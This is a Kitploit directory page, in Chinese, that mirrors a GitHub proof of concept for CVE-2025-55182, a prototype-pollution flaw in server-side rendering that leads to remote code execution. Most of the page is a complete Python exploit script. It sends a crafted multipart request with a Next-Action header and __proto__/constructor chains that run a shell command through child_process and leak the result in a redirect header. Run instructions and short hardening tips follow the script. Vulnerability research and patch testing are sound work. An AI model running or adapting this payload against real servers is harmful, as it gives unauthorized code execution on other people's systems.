Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-Proof-of-Concept — CVE-2025-55182的概念验证(PoC)漏洞利用,演示了服务器端渲染实现中因原型污染导致的远程代码执行。包含Python漏洞利用脚本和安全建议。 | Kitploit
工具/GitHubGitHub/thekamran/cve-2025-55182-proof-of-concept
漏洞分析代码分析漏洞利用Web应用程序漏洞利用学习与教育Payload 开发
GitHubthekamran/cve-2025-55182-proof-of-concept

CVE-2025-55182-Proof-of-Concept

CVE-2025-55182的概念验证(PoC)漏洞利用,演示了服务器端渲染实现中因原型污染导致的远程代码执行。包含Python漏洞利用脚本和安全建议。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
9个月前尚未审核
分享

CVE-2025-55182 概念验证

此仓库包含 CVE-2025-55182 的概念验证 (PoC),该漏洞涉及某些服务器端渲染实现中的原型污染导致远程代码执行 (RCE)。

⚠️ 警告: 此 PoC 仅用于教育、研究以及在个人或受控环境中的授权安全测试。未经许可在系统上使用是非法的。


漏洞概述

当未经验证的用户输入被注入到内部 JavaScript 对象结构(原型污染)时,就会发生此漏洞。当与特定的执行流程结合时,可能导致任意代码执行。

在此 PoC 中,使用链式属性(如 __proto__ 和 constructor)将污染升级为执行上下文。


概念验证

下面是 exploit.py,展示了如何利用此漏洞:

root@kitploit:~
import requests
import json

url = "http://localhost:3000"

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
}

prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"

files = {
    "0": (
        None,
        json.dumps({
            "then": "$1:__proto__:then",
            "status": "resolved_model",
            "reason": -1,
            "value": '{"then":"$B1337"}',
            "_response": {
                "_prefix": prefix,
                "_formData": {"get": "$1:constructor:constructor"}
            }
        }),
        "application/json",
    ),
    "1": (None, "\"$@0\""),
}

response = requests.post(url, headers=headers, files=files)

print("Headers:", response.headers.get('x-action-redirect'))

如何运行

root@kitploit:~
python3 exploit.py

确保仅在本地或开发环境中运行此程序。


补丁状态

如果此漏洞影响实际项目,请检查并安装维护者发布的最新安全补丁。


安全建议

  • 定期运行 npm audit 并应用 npm audit fix 以保持依赖项安全
  • 验证并清理所有用户输入
  • 防止访问内部 JavaScript 对象原型
  • 尽可能使用 SSR 沙箱隔离
  • 在生产环境中限制或禁用 child_process 执行

许可证

MIT 许可证

下载工具